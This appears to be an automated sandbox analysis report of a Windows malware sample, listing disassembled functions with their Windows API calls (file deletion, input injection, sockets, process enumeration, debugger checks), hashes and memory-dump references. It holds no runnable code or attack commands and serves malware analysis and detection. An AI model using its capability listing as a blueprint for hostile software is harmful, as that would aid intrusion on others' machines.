                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 314583886-0
                                                                      • Opcode ID: 60e1896c584cdcb4f5230a9611cc015cd16a863869cb497e4dde9c6a0e29ac7f
                                                                      • Instruction ID: d59f4073d46c9b6f53ab75979351468c1436e3ff9c4cbe3aab4f73ec656b6df2
                                                                      • Opcode Fuzzy Hash: 60e1896c584cdcb4f5230a9611cc015cd16a863869cb497e4dde9c6a0e29ac7f
                                                                      • Instruction Fuzzy Hash: 93C10671A0420DAFCB20EF69DC41BBA7BEDEF85350F2441AAE694D7251EB709E428750
                                                                      Function 00A2D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C3A97,?,?,009C2E7F,?,?,?,00000000), ref: 009C3AC2
                                                                        • Part of subcall function 00A2E199: GetFileAttributesW.KERNEL32(?,00A2CF95), ref: 00A2E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A2D420
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A2D470
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A2D481
                                                                      • FindClose.KERNEL32(00000000), ref: 00A2D498
                                                                      • FindClose.KERNEL32(00000000), ref: 00A2D4A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: c7469ce57568b29b69261da8dd19caf90a37b29d7e10dec24b291ca950d3315a
                                                                      • Instruction ID: 1a2635f24d7a2f0f05c52697eb0641137cf940c103b45b0522d0b1853d3e03a7
                                                                      • Opcode Fuzzy Hash: c7469ce57568b29b69261da8dd19caf90a37b29d7e10dec24b291ca950d3315a
                                                                      • Instruction Fuzzy Hash: BE316F714083559FC204FF64D855EAFB7A8BED5314F444A2DF4D153192EB30AA09C763
                                                                      Function 009FE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      • Opcode ID: 44d8c7ebd99126d65a9e1878fbd77813cf04edf552509ab32058ca31404a2d9c
                                                                      • Instruction ID: 9ee8ecbdee97ee5ad6dd719eda6a97f2c26b511b490b6b70183d5369c8b62cc8
                                                                      • Opcode Fuzzy Hash: 44d8c7ebd99126d65a9e1878fbd77813cf04edf552509ab32058ca31404a2d9c
                                                                      • Instruction Fuzzy Hash: 55C24971E0862C8FDB25CE289D507EAB7B9EF84305F1445EAD54EE7250E778AE818F40
                                                                      Function 00A3648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00A364DC
                                                                      • CoInitialize.OLE32(00000000), ref: 00A36639
                                                                      • CoCreateInstance.OLE32(00A5FCF8,00000000,00000001,00A5FB68,?), ref: 00A36650
                                                                      • CoUninitialize.OLE32 ref: 00A368D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 886957087-24824748
                                                                      • Opcode ID: fa326b2dbc32d3edd4e3502a8c90b3186d90496641d647174581d892bca2298d
                                                                      • Instruction ID: 5a832b6a587d3c4e72e340468025c3284a23c934c262b518846063b5baa9efb3
                                                                      • Opcode Fuzzy Hash: fa326b2dbc32d3edd4e3502a8c90b3186d90496641d647174581d892bca2298d
                                                                      • Instruction Fuzzy Hash: 43D11771908301AFD314EF24C881E6BB7E9BFD9704F10896DF5958B291EB71E905CB92
                                                                      Function 00A422DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00A422E8
                                                                        • Part of subcall function 00A3E4EC: GetWindowRect.USER32(?,?), ref: 00A3E504
                                                                      • GetDesktopWindow.USER32 ref: 00A42312
                                                                      • GetWindowRect.USER32(00000000), ref: 00A42319
                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A42355
                                                                      • GetCursorPos.USER32(?), ref: 00A42381
                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A423DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                      • String ID:
                                                                      • API String ID: 2387181109-0
                                                                      • Opcode ID: aca93e918b39f9e1bd3b7d8215d459e6fb7bd2057edb58c0b0b4a0f6cfa040a7
                                                                      • Instruction ID: 8d2efbc7b8d8a1734a44461e6d80303c65457cdd55c5a6652ecef1f400b5bc7d
                                                                      • Opcode Fuzzy Hash: aca93e918b39f9e1bd3b7d8215d459e6fb7bd2057edb58c0b0b4a0f6cfa040a7
                                                                      • Instruction Fuzzy Hash: D831DE72504315AFC720DF58D849B5BBBA9FFC8724F400919F9859B181DB34EA49CB92
                                                                      Function 00A39B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A39B78
                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A39C8B
                                                                        • Part of subcall function 00A33874: GetInputState.USER32 ref: 00A338CB
                                                                        • Part of subcall function 00A33874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A33966
                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A39BA8
                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A39C75
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                      • String ID: *.*
                                                                      • API String ID: 1972594611-438819550
                                                                      • Opcode ID: 300e4586161b3ddce8b25d875e021ed291e73a10eea12e9ef9f2e11b1d9f9739
                                                                      • Instruction ID: 92b9558bfae39e9b516b9c3da1391b4c6b087ea906d8a260565010628508e208
                                                                      • Opcode Fuzzy Hash: 300e4586161b3ddce8b25d875e021ed291e73a10eea12e9ef9f2e11b1d9f9739
                                                                      • Instruction Fuzzy Hash: A441717190420AAFDF54DFA4C989BEEBBB4FF45311F144159F805A2191EB709E84CF61
                                                                      Function 009D997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 009D9A4E
                                                                      • GetSysColor.USER32(0000000F), ref: 009D9B23
                                                                      • SetBkColor.GDI32(?,00000000), ref: 009D9B36
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Color$LongProcWindow
                                                                      • String ID:
                                                                      • API String ID: 3131106179-0
                                                                      • Opcode ID: 319ced3f1d92149f6f718a23a84434063dd792241ef881eab1416d8232055b56
                                                                      • Instruction ID: 5c624851f5d29ae2aeac676617d0a220ed45519b43ff96f02ad62f9e1c991ddb
                                                                      • Opcode Fuzzy Hash: 319ced3f1d92149f6f718a23a84434063dd792241ef881eab1416d8232055b56
                                                                      • Instruction Fuzzy Hash: 24A13971288500BEE724FB3C8D98EBF26ADEB82350F15860BF412DA7D1DA299D41D271
                                                                      Function 00A41806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A4304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A4307A
                                                                        • Part of subcall function 00A4304E: _wcslen.LIBCMT ref: 00A4309B
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A4185D
                                                                      • WSAGetLastError.WSOCK32 ref: 00A41884
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00A418DB
                                                                      • WSAGetLastError.WSOCK32 ref: 00A418E6
                                                                      • closesocket.WSOCK32(00000000), ref: 00A41915
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 1601658205-0
                                                                      • Opcode ID: 7b25e6288f6edbead8dc263627a364996c76886c229259e213d56c48d1b54d0d
                                                                      • Instruction ID: 0c78bef5a3078d6c71a33f0bc32ed4873522c888702bfed3e64fa736d917aaea
                                                                      • Opcode Fuzzy Hash: 7b25e6288f6edbead8dc263627a364996c76886c229259e213d56c48d1b54d0d
                                                                      • Instruction Fuzzy Hash: FC519375A00210AFDB10EF64C886F6A7BE5ABC4718F18845CF9169F3D3D771AD428BA1
                                                                      Function 00A51C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                      • String ID:
                                                                      • API String ID: 292994002-0
                                                                      • Opcode ID: 635fd9237e847e943eca6083ab0396d048b00b718c2106cb4826e5ea5c404713
                                                                      • Instruction ID: c0125303c030cbaf24b9553683056782118f3505dfb67d6ce56b32fdd7ec40bb
                                                                      • Opcode Fuzzy Hash: 635fd9237e847e943eca6083ab0396d048b00b718c2106cb4826e5ea5c404713
                                                                      • Instruction Fuzzy Hash: 7C219F317402105FD7208F2AC884F7A7BA5FF95326B19806CEC4A8B351DB72ED46CB90
                                                                      Function 009C8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                      • API String ID: 0-1546025612
                                                                      • Opcode ID: 5376986294125546684860a00b456a9662a3e14ef719e96281b865c546aa354a
                                                                      • Instruction ID: f5efd05ac55e0431ac499be39a83721075b08bde946301c2cdb0936d3bcacff7
                                                                      • Opcode Fuzzy Hash: 5376986294125546684860a00b456a9662a3e14ef719e96281b865c546aa354a
                                                                      • Instruction Fuzzy Hash: ECA2AE70E0061ECBDF24CF58D944BAEB7B1BF44314F2485AAE815AB281EB749D91CF91
                                                                      Function 00A4A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00A4A6AC
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00A4A6BA
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00A4A79C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4A7AB
                                                                        • Part of subcall function 009DCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00A03303,?), ref: 009DCE8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                      • String ID:
                                                                      • API String ID: 1991900642-0
                                                                      • Opcode ID: feb951d5be57c7f2835667a06f32d1879068e48c34a4326185c4c641b7b05f32
                                                                      • Instruction ID: b810c9ba41773712b269a67a0cd7eabf4b837221e67ae634a78418a7ec20bf92
                                                                      • Opcode Fuzzy Hash: feb951d5be57c7f2835667a06f32d1879068e48c34a4326185c4c641b7b05f32
                                                                      • Instruction Fuzzy Hash: A851F6B59083009FD710EF64C886E6ABBE8FFC9754F40891DF59697251EB30D905CBA2
                                                                      Function 00A2AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00A2AAAC
                                                                      • SetKeyboardState.USER32(00000080), ref: 00A2AAC8
                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00A2AB36
                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00A2AB88
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 352894fe17361fc0ef1be3469246147194f32101e27495e78efacc611be55e9c
                                                                      • Instruction ID: e31a651f3a505ad3007a73768f882728630f25146ef49ccbe8d6539e680cd1b7
                                                                      • Opcode Fuzzy Hash: 352894fe17361fc0ef1be3469246147194f32101e27495e78efacc611be55e9c
                                                                      • Instruction Fuzzy Hash: 9A311670A40328AFFB35CB6CAC05BFA7BA6EF64320F04422AF181961D0D3758D85C762
                                                                      Function 00A3CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00A3CE89
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00A3CEEA
                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00A3CEFE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                      • String ID:
                                                                      • API String ID: 234945975-0
                                                                      • Opcode ID: d1413248e96df8374fda0d3571f93ca88e9339a1a9a85e2121a96e2c072761da
                                                                      • Instruction ID: 50e5ec45acd4e5b88a96b8d3c66326f1de4c16a34fb12563eb55f86c4d9b7acd
                                                                      • Opcode Fuzzy Hash: d1413248e96df8374fda0d3571f93ca88e9339a1a9a85e2121a96e2c072761da
                                                                      • Instruction Fuzzy Hash: AD219AB1500705AFEB20DFA5CD48BAAB7F8EB40769F20442EF546A2151EB70EE058B64
                                                                      Function 00A28298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A282AA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: ($|
                                                                      • API String ID: 1659193697-1631851259
                                                                      • Opcode ID: 63849e8fc8e61741ef6b5c207da78bdf1d8af69925aaa2ad679fdba4dd97864f
                                                                      • Instruction ID: c30edc5f7c36fe4ab0310ba1a7cc2f67d04157b58803a2a6b243b5f3f96744ba
                                                                      • Opcode Fuzzy Hash: 63849e8fc8e61741ef6b5c207da78bdf1d8af69925aaa2ad679fdba4dd97864f
                                                                      • Instruction Fuzzy Hash: 71324474A016159FCB28CF19D081AAAB7F0FF48710B15C46EE49ADB7A1EB74E981CB40
                                                                      Function 00A35C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A35CC1
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00A35D17
                                                                      • FindClose.KERNEL32(?), ref: 00A35D5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 90b6f1823a2210b9cb3ff81bd47a2ac922f2e53581f4ee96c24d16eefdc37202
                                                                      • Instruction ID: 843bc951f63e281be04f50c2d04b045958ecd34189a031676dfa68b8707ca666
                                                                      • Opcode Fuzzy Hash: 90b6f1823a2210b9cb3ff81bd47a2ac922f2e53581f4ee96c24d16eefdc37202
                                                                      • Instruction Fuzzy Hash: 27514374A04A019FC714DF28C494E9AB7E4FF49324F14855EF9AA8B3A2DB30ED45CB91
                                                                      Function 009F2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 009F271A
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009F2724
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 009F2731
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
